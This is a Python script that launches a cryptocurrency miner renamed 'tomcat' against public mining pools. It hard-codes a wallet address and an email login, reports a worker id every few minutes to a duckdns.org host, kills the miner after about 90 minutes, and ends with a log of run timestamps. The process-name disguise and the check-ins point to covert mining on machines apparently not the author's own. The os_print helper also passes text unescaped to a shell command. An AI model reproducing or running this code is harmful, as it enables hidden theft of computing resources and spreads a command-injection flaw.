import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:07:05.558230
#2018-02-17 16:55:03.333284
#2018-02-17 18:43:05.102888
#2018-02-17 20:31:06.466541
#2018-02-17 22:17:04.656620
#2018-02-18 00:01:04.132316
#2018-02-18 01:52:05.601782
#2018-02-18 03:40:06.311612
#2018-02-18 05:27:04.790463
#2018-02-18 07:19:07.121471
#2018-02-18 09:07:03.876507
#2018-02-18 10:53:05.360996
#2018-02-18 12:40:01.463383
#2018-02-18 14:26:07.880255
#2018-02-18 16:16:07.499315
#2018-02-18 18:04:04.289026
#2018-02-18 19:51:03.562041
#2018-02-18 21:38:02.189022
#2018-02-18 23:26:04.393259
#2018-02-19 01:13:05.031057
#2018-02-19 02:59:05.660951
#2018-02-19 04:46:05.090480
#2018-02-19 06:29:07.007207
#2018-02-19 08:19:05.138657
#2018-02-19 10:08:07.395664
#2018-02-19 11:57:06.487385
#2018-02-19 13:44:06.756541
#2018-02-19 15:35:01.387605
#2018-02-19 17:22:05.036960
#2018-02-19 19:11:07.487233
#2018-02-19 20:58:01.926369
#2018-02-19 22:46:01.932799
#2018-02-20 00:30:09.829120
#2018-02-20 02:17:06.772312
#2018-02-20 04:08:06.461538
#2018-02-20 05:51:06.452081
#2018-02-20 07:37:05.414797
#2018-02-20 09:22:05.685267
#2018-02-20 11:06:06.834242
#2018-02-20 12:54:04.168351
#2018-02-20 14:40:09.749820
#2018-02-20 16:25:11.734642
#2018-02-20 18:11:01.355424
#2018-02-20 20:02:09.065208
#2018-02-20 21:49:07.896300
#2018-02-20 23:31:05.642539
#2018-02-21 01:15:01.654137
#2018-02-21 03:02:05.160432
#2018-02-21 04:49:01.779289
#2018-02-21 06:33:05.337258
#2018-02-21 08:18:02.075595
#2018-02-21 10:05:02.614207
#2018-02-21 11:52:09.350177
#2018-02-21 13:44:14.026645
#2018-02-21 15:32:01.871586
#2018-02-21 17:21:09.107689
#2018-02-21 19:10:11.256175
#2018-02-21 20:57:01.419639
#2018-02-21 22:44:02.225551
#2018-02-22 00:35:03.976652
#2018-02-22 02:22:01.276188
#2018-02-22 04:08:07.598100
#2018-02-22 05:53:05.226291
#2018-02-22 07:39:07.591573
#2018-02-22 09:27:05.335959
#2018-02-22 11:13:09.078094
#2018-02-22 12:59:07.788149
#2018-02-22 14:48:05.706991
#2018-02-22 16:34:06.167588
#2018-02-22 18:19:06.265340
#2018-02-22 20:09:08.779165
#2018-02-22 21:57:05.362856
#2018-02-22 23:46:01.589654
#2018-02-23 01:35:03.072290
#2018-02-23 03:21:08.106881
#2018-02-23 05:07:04.107565
#2018-02-23 06:53:01.790377
#2018-02-23 08:43:02.030404
#2018-02-23 10:58:05.716146
#2018-02-23 12:55:05.177379
#2018-02-23 14:39:06.588778
#2018-02-23 16:29:07.362063
#2018-02-23 18:17:02.142572
#2018-02-23 20:02:05.026051
#2018-02-23 21:45:09.001260
#2018-02-23 23:40:06.302958
#2018-02-24 01:31:07.736090
#2018-02-24 03:21:02.010067
#2018-02-24 05:05:07.421006
#2018-02-24 06:55:06.490717
#2018-02-24 08:45:06.032482
#2018-02-24 10:40:01.490849
#2018-02-24 12:29:06.492628
#2018-02-24 14:20:08.531064
#2018-02-24 16:07:02.071481
#2018-02-24 17:58:07.177167
#2018-02-24 19:46:02.073035
#2018-02-24 21:32:06.755129
#2018-02-25 00:18:04.267979
#2018-02-25 04:26:05.079364
#2018-02-25 08:07:06.598220